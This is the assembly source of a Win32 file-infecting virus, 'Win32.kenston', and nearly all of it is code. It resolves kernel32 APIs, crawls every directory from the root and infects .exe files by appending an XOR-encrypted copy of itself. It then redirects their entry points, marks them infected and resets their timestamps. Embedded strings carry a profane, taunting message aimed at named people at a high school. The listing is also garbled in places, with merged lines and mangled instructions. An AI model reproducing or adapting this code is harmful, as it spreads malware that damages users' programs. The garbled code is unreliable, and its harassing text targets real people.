Win32.kenston
.386
Locals
Jumps
.Model flat, stdcall
EXTRN EXITPROCESS: PROC
ORG 1000H
.DATA
DB "this is a virus.", 0
.code
Progstart:
PUSH 0
Call EXITPROCESS
Startvirus:
Call relative
RELATIVITY:
POP EBP
CLD
MOV EAX, EBP
DB 2DH; SUB EAX,
SaveEntry Dd (Offset Relative- Offset Progstart)
Push EAX
Sub EBP, Offset Relative
MOV ECX, DWORD PTR [ESP 4]
And ECX, 0FFF00000H
MOV EBX, 0BFF70000H; Base Address of Win95's Kernel
CMP ECX, 0BFF00000H; Are We win95 or 98?
JE Vulnerable
MOV EBX, 077F00000H
CMP ECX, EBX; Are We NT?
JNE EXIT
Vulnerable:
MOV ECX, EBX
Mov Edx, ECX; PUT ImageBase In EDX
MOV DWORD PTR [EBP ImageBase], ECX; Save the ImageBase
XOR EAX, Eax; Clear Eax
MOV AX, Word PTR [EDX 3CH]; Get Relocation In MZ HEADER
Add Ecx, Eax; Make ECX Start of Pe Header
CMP Word PTR [ECX], 'EP'; Is Every Working Right?
JNE EXIT
MOV Eax, DWORD PTR [ECX 120]; Get RVA of Export Table
Add Eax, Adx; Add on The ImageBase
MOV DWORD PTR [EBP Offset ExportTable], EAX; Save The ExportTable's Address
MOV ECX, DWORD PTR [EAX 24]; Get Number of Entry's
Dec Ecx; Drop Number by One SO Bottom Loop Works
MOV DWORD PTR [EBP Offset Numexports], ECX; Store Number of Entrys
MOV ECX, DWORD PTR [EAX 28]; Get RVA of the Address Table
Add ECX, EDX; Bias It by the image base
MOV DWORD PTR [EBP Offset AddresStable], ECX; Save The Address
MOV ECX, DWORD PTR [EAX 36]; Get RVA of the Ordinal Table
Add ECX, EDX; Bias It by the image base
MOV DWORD PTR [EBP Offset OrdinalTable], ECX; Save The Address
Mov ECX, DWORD PTR [EAX 32]; Get RVA of the name Table
Add ECX, EDX; Bias It by the image base
MOV DWORD PTR [EBP Offset NameTable], ECX; Save The Address; Upon Entry:
ECX = Start of RVA String Table
; eDX = imagebase
EBX = start of string of function to resolve
Returns:
EBX = Address of function
LEA EBX, [EBP Offset LoadLibraryas]; Function to Scan for
Push Ecx; Save Start of Rva Name Table
Call ResolveExport; Resolve LoadLibrarya
POP ECX
MOV DWORD PTR [EBP Offset LoadLibrarya], EBX; Save Address of LoadLibrary
LEA EBX, [EBP GETPROCADDRESSS]; Load Address of Function to Resolve
Call resolveexport; resolve getprocaddress
MOV DWORD PTR [EBP Offset getProcaddress], EBX; Save getProcaddress
Lea ESI, [EBP OFFSET APILIST]; WHERE Function STRINGS ARE Started
Lea EDI, [EBP Offset Findfile]; WHERE TO Store Resolved Address's
Call MakeTable
Lea EBX, [EBP OFFSET DIRSAVE]
Push EBX
Push 256
MOV EBX, [EBP Offset getcurrentdir]
Call EBX
CMP EAX, 00H
JE EXIT; if not successful1nu quit
Lea EBX, [EBP Offset root]; Go to the root directory
Push EBX
MOV EBX, DWORD PTR [EBP Offset SetCurrentdir]
Call EBX
CMP EAX, 01; WERE WE SUCESSFULL?
JNE EXIT; if not kil
Call InfectFirstDirectory
Lea EBX, [EBP OFFSET DIRSAVE]; Go to the Original Directory
Push EBX
MOV EBX, DWORD PTR [EBP Offset SetCurrentdir]
Call EBX
EXIT:
POP Eax; return to Host
JMP EAX
InfectFirstDirectory:
Lea EBX, [EBP OFFSET WIN32_FILE_DATA]
Push EBX
Lea EBX, [EBP Offset DirWildCard]
Push EBX
MOV EBX, DWORD PTR [EBP Offset Findfile]
Call EBX
CMP EAX, -1
Je donedirscanning
Mov DWORD PTR [EBP Offset Dirsearchhandle], EAX; Save Our Search Handle
CMP DWORD PTR [EBP Offset Fileattr], 10H
JNE NOTIR1CMP BYTE PTR [EBP OFFSET FULLNAME], '.'
JE InfectNextdiRectory
Call TryinfectingDir; Try Infecting The Possible Directory
NOTIR1:
InfectNextDirectory:
Lea EBX, [EBP OFFSET WIN32_FILE_DATA]; WHERE TO Store FileInfo
Push EBX
Push DWORD PTR [EBP OFFSET DIRSEARCHHANDLE]
MOV EBX, DWORD PTR [EBP Offset Findnext]
Call Ebx; Find Next File
CMP EAX, 01
JNE Donedirscanningnnefound
CMP DWORD PTR [EBP Offset Fileattr], 10H
JNE NOTIR2
CMP BYTE PTR [EBP OFFSET FULLNAME], '.'
JE NOTIR2
Call TryinfectingDir
NOTIR2:
JMP InfectNextDirectory
DONEDIRSCANNING:
Push DWORD PTR [EBP OFFSET DIRSEARCHHANDLE]; Close The Search Handle
MOV EAX, [EBP Offset Findclose]
Call EAX
DonedirscanningnoneFound:
RET
TryinfectingDir:
LEA EBX, [EBP Offset Fullname]; Go to the Dir We Found
Push EBX
MOV EBX, DWORD PTR [EBP Offset SetCurrentdir]
Call EBX
CMP EAX, 01; WAS IT Really A Directory?
JNE NOTIRECTORY; if Not Dont Infect It or Drop Out of IT
Call Findfirstfile
Push DWORD PTR [EBP OFFSET DIRSEARCHHANDLE]
Call InfectFirstDirectory
POP DWORD PTR [EBP Offset DirsearchHandle]
Lea EBX, [EBP Offset Dotdot]; We Are Going to the Previous Dir
Push EBX
MOV EBX, DWORD PTR [EBP Offset SetCurrentdir]
Call EBX
NOTIRECTORY:
RET
Findfirstfile:
Lea EBX, [EBP OFFSET WIN32_FILE_DATA]; WHERE FILE INFO GoES
Push EBX
Lea EBX, [EBP Offset ExewildCard]; What to Search for
Push EBX
MOV EBX, DWORD PTR [EBP OFFSET FINDFILE]; FIND FIRST FILE
Call EBX
CMP EAX, -1; Error?
Je EXITSCANNING
MOV DWORD PTR [EBP Offset SearchHandle], EAX; SAVE SEARCH HANDLE
JMP check_file
FINDNEXTFILE:
Lea EBX, [EBP OFFSET WIN32_FILE_DATA]; WHERE to Store FileInfopush EBX
Push DWORD PTR [EBP OFFSET SearchHandle]; Saved Search Handle
MOV EBX, DWORD PTR [EBP Offset Findnext]
Call Ebx; Find Next File
CMP EAX, 01
JNE Donescanning
Check_file:
PUSH 0
Push 20h
Push 3; Open EXISTING FILE
PUSH 0
PUSH 0
PUSH 80000000H 40000000H; Open forread and Writing
Lea EBX, [EBP OFFSET FULLNAME]
Push EBX
MOV EBX, DWORD PTR [EBP OFFSET CREATEFILE]
Call EBX
CMP EAX, -1; WAS THERE Any Error?
JE FINDNEXTFILE
MOV DWORD PTR [EBP FileHandle], EAX; Save File Handle
XOR EAX, EAX
Lea EDI, [EBP Offset Workbuffer 56]; Go to Memory To Initalize
Stosd
Stosd; this fixes a very lame bug, IT Should Really Zero Out the
WHOLE WORKBUFFER BEFORE EACH FILE
; Is Read But Since ITS A Runtime Virus ITS Written
.
Mov EDX, 63; Read in First 63 Bytes
Lea ECX, [EBP OFFSET WORKBUFFER]; Buffer We Read INTO
Call read_file
CMP DWORD PTR [EBP OFFSET BYTESREAD], 63
JB TryNext; Did We Read in Enough?
Lea EBX, [EBP OFFSET WORKBUFFER]
CMP Word PTR [EBX], 'ZM'; Is IT AN EXE?
JNETNEXT; if IT ISNT Scan Next File
Add Ebx, 3bh; Go to the Infection Marker
CMP BYTE PTR [EBX], 'A'; Are We Infected Already?
JE TryNext; if SO Try Next File
Inc EBX; Point to Relocation
MOV EDX, DWORD PTR [EBX]; Read The Relocation
MOV DWORD PTR [EBP Offset Mzreloc], EDX; Save The Relocation
Call set_point; set file pointer to peeader
CMP EAX, 0FFFFFFFH
JE TryNext
Mov EDX, 120; Try to read in first 120 bytes of pe header
Lea ECX, [EBP OFFSET WORKBUFFER]; Buffer We Read INTO
Call read_file
CMP DWORD PTR [EBP OFFSET BYTESREAD], 120
JNE TRYNEXT; DID WEE READ?
CMP Word PTR [EBP OFFSET WORKBUFFER], 'EP'; Are We in in The Peheader?
JNE TryNext
MOV EBX, DWORD PTR [EBP Offset Headersze]; Get The Headersize
Sub EBX, DWORD PTR [EBP Offset Mzreloc]; Subtract The MZ HEADER
MOV DWORD PTR [EBP Offset Headersize], EBX; Save The PE Header's Size
CMP EBX, 3000; Are We Going to overflow Our memory?
Ja TryNext
Push Ebx; Save Number of Bytes To Read in
MOV EDX, DWORD PTR [EBP Offset Mzreloc]; Reset Pointer Back to the Peheader
Call set_pointer
CMP EAX, 0FFFFFFFH
JE TryNext
Pop Edx; try to read in Headersize Bytes
Lea ECX, [EBP OFFSET WORKBUFFER]; Buffer We Read INTO
Call read_file
MOV EBX, DWORD PTR [EBP Offset Headersize]; How Many Bytes SHOULD HAVE BEEN READ?
CMP EBX, DWORD PTR [EBP OFFSET BYTESREAD]
JNE TRYNEXT; DID WEE READ?
XOR ECX, ECX
MOV CX, Word PTR [EBP OFFSET NUMOBJECTS]; Read in Number of Objects
CMP CX, 00H; Are there Objects?
JE TryNext
XOR EBX, EBX
MOV BX, Word PTR [EBP Offset Ntheadersze]; Read in The Ntheadersize
Add EBX, 24; Add on The REST
Lea EDX, DWORD PTR [EBP OFFSET WORKBUFFER]
Workbuffer NTheadersize 24 = Start of Object Table
Add Edx, Ebx; Locate The Object Table
Push EDX; Save Start of Object Table
XOR EDX, EDX
Mov Eax, Ecx; Handoff # of Objects
MOV ECX, 40; Each Object IS 40 BYTES LONG
Mul Ecx; # Objects * 40
Sub eax, 40; Backtrack to Start of Last Object
POP EDX; Make Edx The Start of the Object Table in Memory
Add Edx, Eax; Point Edx To Last Object
MOV EBX, DWORD PTR [EDX 20]; Load the Physical Offset
Push Ebx; Save for Use with Virtual Size
MOV EAX, DWORD PTR [EDX 16]; Load The Physical SizeAdd EBX, EAX; Add Them Together
MOV EDI, DWORD PTR [EBP OFFSET FileSize]; Wont Workiffi File Is Larger Than 4.3 Gigs ... Oh Well
Add Edi, Offset Endvirus - Offset Startvirus (Offset EncryptionFrame - Offset Encrypt); Put on The Virussize of Our Virus in Memory
Sub EDI, EBX; DETERMINE DISTANCE FROM End of Virus To Old End of Object
Add Eax, EDI; Make Our New Physical Size
MOV EBX, EAX
Sub EBX, (Offset Endvirus-Offset StartVirus) (Offset EncryptionFrame - Offset Encrypt)
MOV ESI, DWORD PTR [EDX 12]; Get RVA for DETERMININING EntryPoinTrva
Add ESI, EBX; Find Out Our EntryPoinTrva
MOV DWORD PTR [EBP Offset Virusrva], ESI; Save The Virus's RVA
Add ESI, DWORD PTR [EBP OFFSET IMGBASE]; make the entrypoint rva the entrypointva
Add ESI, (Offset EncryptionFrame - Offset Encrypt); Make It Point To The Encrypted Virus in Memory
MOV DWORD PTR [EBP Offset Virusva], ESI; Save the Va for Later
MOV ECX, DWORD PTR [EBP Offset FileAlign]; Get Our Alignment Value
Call file_align; Aligns EAX
MOV DWORD PTR [EDX 16], Eax; Save Our New Physical Size
POP EBX; Load The Physical Offset
MOV EAX, DWORD PTR [EDX 8]; Load the Virtual Size
Add EBX, EAX; DETERMINE End of Virtual Space
MOV EDI, DWORD PTR [EBP Offset FileSize]
Add Edi, Offset Buffset - Offset Startvirus (Offset EncryptionFrame - Offset Encrypt); Add The Virus and ITS Heap To IT
Sub EDI, EBX; DETERMINE DITANCE BETWEEN End of Virus's Heap and End of Virtual Space
Add Edi, Eax; Make Our Virtual Size
MOV DWORD PTR [EDX 8], EDI; Save Our New Virtualsize
MOV ECX, DWORD PTR [EDX 12]; Get The Objects RVA
Add ECX, EDI; Make Our New ImageSizeMov DWORD PTR [EBP Offset ImageSize], ECX; Save Our New iMagesize
MOV DWORD PTR [EDX 36], 0E0000040H; FIX THE FLAGS
WE Do All the dispatcher and loading shit here
MOV ECX, DWORD PTR [EBP Offset EntryPoinTrva]
MOV EAX, DWORD PTR [EBP Offset Virusrva]
MOV DWORD PTR [EBP Offset EntryPoinTrva], EAX
Sub Eax, ECX
Add Eax, Offset RELATIVITY - OFFSET EncryptionFrame - Offset Encrypt; Makeup for the Call Instruction
MOV DWORD PTR [EBP Offset SaveEntry], EAX
Mov EDX, 3BH; Offset We Write Marker Byte At
Call set_point; go to place to write marker
MOV EBX, 1H; Write One byte
Lea ECX, DWORD PTR [EBP OFFSET InfectionMarker]; The byte to write
Call Write_File; Write the Infection Marker
MOV EDX, DWORD PTR [EBP Offset Mzreloc]
Call set_point; goto the start of the peheader
Mov EBX, DWORD PTR [EBP Offset BytesRead]; How much to write
Lea ECX, [EBP OFFSET WORKBUFFER]; Write Our Modified PE Header
Call write_file; write it!
Lea ESI, [EBP Offset Startvirus]; COPY The Virus to the Work Buffer to Encrypt
Lea EDI, [EBP OFFSET WORKBUFFER]; WHERE to COPY IT
MOV DWORD PTR [EBP Offset Startencrypt], EDI; We use this best
MOV ECX, (Offset endvirus - offset startvirus); How much to copy
REP MOVSB
Inc Byte PTR [EBP Offset Key]; Change the Key
Call Encrypt; Encryptur Code
MOV EBX, DWORD PTR [EBP VIRUSVA]; Get Our Entrypoint VA
MOV DWORD PTR [EBP Offset Startencrypt], EBX; Store IT IN THE ROUTINE
XOR EDX, EDX
Call set_eof; go to eof
MOV EBX, (Offset EncryptionFrame - Offset Encrypt); Size of Encryption Routine To Write
LEA ECX, [EBP Offset Encrypt]; Write Encryption RoutineCall Write_File
MOV EBX, (Offset endvirus - offset startvirus); size of the virus to write
Lea ECX, [EBP Offset Workbuffer]; WHERE The Encrypted Virus IS in Memory
Call Write_File; Write the Virus
Lea EBX, [EBP Offset Lastwrittime]; Get Ptr To Last WriteTime
Push EBX
SUB EBX, 8; Point It to LastAccesstime
Push EBX
SUB EBX, 8; Point It to createtime
Push EBX
Push DWORD PTR [EBP Offset FileHandle]; Push On The File Handle
MOV EBX, DWORD PTR [EBP Offset SetFileTime]
Call Ebx; Change The File's Times
Call Close_file
Donescanning:
Push DWORD PTR [EBP OFFSET SearchHandle]
MOV EAX, [EBP Offset Findclose]
Call EAX
EXITSCANNING:
RET
TryNext:
Call Close_file
JMP FindNextFile
Read_file:
PUSH 0
Lea EBX, [EBP OFFSET BYTESREAD]; WHERE TO PUT # of Bytes Read
Push EBX
Push Edx; Number of Bytes To Read
PUSH ECX; Address of buffer
Push DWORD PTR [EBP OFFSET FILEHANDLE]
MOV EBX, DWORD PTR [EBP Offset ReadFile]
Call ebx; read the file
RET
WRITE_FILE:
PUSH 0
Lea Eax, [EBP OFFSET BYTESWRITTEN]
Push Eax; Where to return # of bytes Written
Push ebx; # of bytes to write
Push ECX; WHERE to WRITE FROM
Push DWORD PTR [EBP OFFSET FILEHANDLE]
MOV EBX, DWORD PTR [EBP Offset Writefile]
Call EBX
RET
UPON Entry:
; edx = new actual address in file
SET_EOF:
Push 02h
JMP Jumpover
Set_pointer:
Push 00
Jumpover:
PUSH 0
Push Edx; WHERE to Go In File
Push DWORD PTR [EBP OFFSET FILEHANDLE]
MOV EBX, [EBP OFFSET SETFILEPOINTER]
Call EBX
RET
File_Align:
UPON Entry ECX = Alignment Value
EAX = Size to Process
EAX RETURNS Aligned Size
Push Edx
XOR EDX, EDXDIV ECX
INC EAX
Mul ECX
POP EDX
RET
Close_file:
Push DWORD PTR [EBP OFFSET FILEHANDLE]
MOV EAX, DWORD PTR [EBP Offset Closefile]
Call Eax; Close The File
RET
UPON Entry:
ESI = function string table.
EDI = OUR Address Table.
Maketable:
Lea EBX, [EBP Offset LoadLibrarya]
Push ESI; Next in string Table
Call DWORD PTR [EBX]; Call LoadLibrarya
Mov Edx, EAX; Save Module Handle
Loopuntilnull:
Inc ESI
CMP Byte PTR [ESI], 00H
JNE Loopuntilnull; Loop Until At End of String
Inc ESI
CMP BYTE PTR [ESI], 01H; Are We on LOOP?
Je donelooping
Lea EBX, [EBP Offset getProcaddress]
Push Edx
Push ESI; POINTER TO FUNCTION NAME
Push EDX; Base Address of DLL
Call DWORD PTR [EBX]; GetProcaddress in import Table
POP EDX
Stosd
JMP Loopuntilnull
Donelooping:
RET
ResolveExport:
UPON Entry:
ECX = Start of RVA String Table
; eDX = imagebase
EBX = start of string of function to resolve
Returns:
EBX = Address of function
XOR EDI, EDI
ScanString:
Mov ESI, DWORD PTR [ECX]; Load RVA of String to SCAN
Add ESI, EDX; Bias IT by the imagebase
Push Ebx; Bad Way to Save EBX for Later USE
Scanloop:
Lodsb
CMP AL, 00H; Is IT A NULL CHARACTER?
Je FoundString
CMP BYTE PTR [EBX], Al; Does The Character Match?
JNE ScanNext; if not scan next string
Inc Ebx; Advance The Byte We Are
Scanning for.
JMP scanloop
ScanNext:
POP EBX
Add ECX, 4; Move it to the next export?
Inc EDI; Increment THE Counter
CMP DWORD PTR [EBP NUMEXPORTS], EDI; Are We On Last Export?
JE EXIT; ABORT IF OUT OF EXPORTS
JMP ScanString
Foundstring:
POP EBX; Keep The Stack Nice and NEAT
Add Edi, EDI; Multiply By 2 Because Ordinal
Table IS 16 BITS
MOV EBX, DWORD PTR [EBP OrdinalTable] Add Edi, EBX; Point Edi To GetProcaddress's Entry
XOR EBX, EBX
MOV BX, Word PTR [EDI]; Get 16bit Ordinal Number
Lea EBX, [EBX * 4]; Multiply by 4 Because The Address
Table is Made of Double Words.
MOV ESI, DWORD PTR [EBP AddResSTable]
Add ESI, EBX; Point ESI TO RVA in AddresStable
MOV EBX, DWORD PTR [ESI]; Move RVA to EBX
Add Ebx, EDX; Offset It with The ImageBase
RET
ENCRYPT:
MOV ECX, (Offset endvirus - offset startvirus)
DB 0BBH; MOV EBX,
Startencrypt DD 000000000H
DB 0B0H; MOV Al,
Key DB 00H
Xorloop:
XOR BYTE PTR [EBX], Al
Inc EBX
Dec ECX
CMP ECX, 00H
JNE Xorloop
EncryptionFrame:
RET
StartData:
WE Use these to find functions in kernel32.dll's export table
LoadLibraryas DB "LoadLibrarya"
GetProcadDresss DB "getProcaddress"
THESE Are The Functions We need to get the address's of:
APILIST:
DB "kernel32", 0
DB "Findfirstfilea", 0
DB "findnextfilea", 0
DB "FindClose", 0
DB "setfileAttributesa", 0
DB "setfiletime", 0
DB "CreateFilea", 0
DB "readfile", 0
DB "Writefile", 0
DB "setfilepointer", 0
DB "closehandle", 0
DB "setcurrentdirectorya", 0
DB "getcurrentdirectorya", 0,01h; 01h stoods the loosition up
DB "Boles and Manning Are Arrogant Facists."
DB "They Have No Computer Sk1llz And Kenston High School's"
DB "Computers Are 0wn3d. I am Back Koons You MotherFucker"
DB "Down with Kenston ..... You Tried to Rid Yourself of Me Before"
DB "but failed"
DB "Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
DirWildCard DB "*.", 0
ExewildCard DB "* .exe", 0
InfectionMarker DB "a" dotdot db "..", 0
Root db "", 0
Endvirus:
; The installed by the image based
ImageBase DD 1 DUP (?)
ExportTable DD 1 DUP (?)
AddresStable DD 1 DUP (?)
Nametable DD 1 DUP (?)
OrdinalTable DD 1 DUP (?)
Numexports DD 1 DUP (?)
GetProcaddressCall DD 1 DUP (?)
; THESE is Used in Infecting Files
BYteswritten DD 1 DUP (?)
SearchHandle DD 1 DUP (?)
DIRSEARCHHANDLE DD 1 DUP (?)
FileHandle DD 1 DUP (?)
BYTESREAD DD 1 DUP (?)
Mzreloc DD 1 DUP (?)
Headersize DD 1 DUP (?)
NTHEADERSIZE DD 1 DUP (?)
Virusrva DD 1 DUP (?)
InfectCounter DD 1 DUP (?)
Virusva DD 1 DUP (?)
Place to Store The Two Routines Used to Look Up The Rest
LoadLibrarya DD 1 DUP (?)
GetProcaddress DD 1 DUP (?)
This Becomes A Table of these Functions Address's
Findfile DD 1 DUP (?)
FINDNEXT DD 1 DUP (?)
FindClose DD 1 DUP (?)
SetAttrib DD 1 DUP (?)
SetFileTime DD 1 DUP (?)
Createfile DD 1 DUP (?)
READFILE DD 1 DUP (?)
Writefile DD 1 DUP (?)
SetFilePointer DD 1 DUP (?)
Closefile DD 1 DUP (?)
SetCurrentDir DD 1 DUP (?)
GetCurrentDir DD 1 DUP (?)
DIRSAVE DB 256 DUP (?)
WIN32_FILE_DATA:
FileAtTR DD 1 DUP (?)
CreateTime DD 2 DUP (?)
Lastaccesstime DD 2 DUP (?)
LastWritetime DD 2 DUP (?)
DD 1 DUP (?)
FILSIZE DD 1 DUP (?)
Resv DD 2 DUP (?)
Fullname DB 256 DUP (?)
RealName DB 256 DUP (?)
Workbuffer:
Signature DD 1 DUP (?)
CPUTYPE DW 1 DUP (?)
NumObjects dw 1 dup (?)
DD 3 DUP (?)
NTHEADERSZE DW 1 DUP (?)
Flags dw 1 dup (?)
DD 4 DUP (?)
EntryPoinTrva DD 1 DUP (?)
DD 2 DUP (?)
IMGBASE DD 1 DUP (?)
ObjectAlign DD 1 dup (?)
FileAlign DD 1 DUP (?)
DD 4 DUP (?)
ImageSize DD 1 DUP (?)
Headersze DD 1 DUP (?)
DB 3000 DUP (?)
Bufferend:
Endsend Startvirus
